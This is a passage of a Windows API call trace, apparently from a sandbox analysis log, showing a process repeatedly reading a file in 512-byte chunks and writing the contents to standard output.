0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.508] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.508] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] GetFileType (hFile=0x50) returned 0x1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] GetFileType (hFile=0x50) returned 0x1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] GetFileType (hFile=0x50) returned 0x1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] GetFileType (hFile=0x50) returned 0x1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.509] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.509] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.511] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.511] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.512] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.512] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.514] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.514] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] GetFileType (hFile=0x50) returned 0x1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] GetFileType (hFile=0x50) returned 0x1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] GetFileType (hFile=0x50) returned 0x1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.515] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.515] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.517] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.517] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, 